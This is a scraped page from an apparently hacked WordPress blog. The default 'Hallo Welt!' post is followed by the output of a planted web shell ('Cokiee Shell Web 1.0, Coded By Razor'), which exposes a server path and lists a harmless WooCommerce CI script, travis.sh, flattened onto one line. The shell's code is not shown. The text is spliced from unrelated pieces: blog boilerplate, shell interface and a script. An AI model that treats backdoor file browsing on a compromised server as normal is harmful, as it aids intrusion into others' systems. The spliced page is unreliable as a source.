Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /var/www/web284/html/wp-content/plugins/woocommerce/tests/bin/ |
Current File : //var/www/web284/html/wp-content/plugins/woocommerce/tests/bin/travis.sh |
#!/usr/bin/env bash # usage: travis.sh before|after if [ $1 == 'before' ]; then # composer install fails in PHP 5.2 [ $TRAVIS_PHP_VERSION == '5.2' ] && exit; # install php-coveralls to send coverage info composer init --require=satooshi/php-coveralls:0.7.x-dev -n composer install --no-interaction elif [ $1 == 'after' ]; then # no Xdebug and therefore no coverage in PHP 5.2 [ $TRAVIS_PHP_VERSION == '5.2' ] && exit; # send coverage data to coveralls php vendor/bin/coveralls --verbose --exclude-no-stmt fi
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare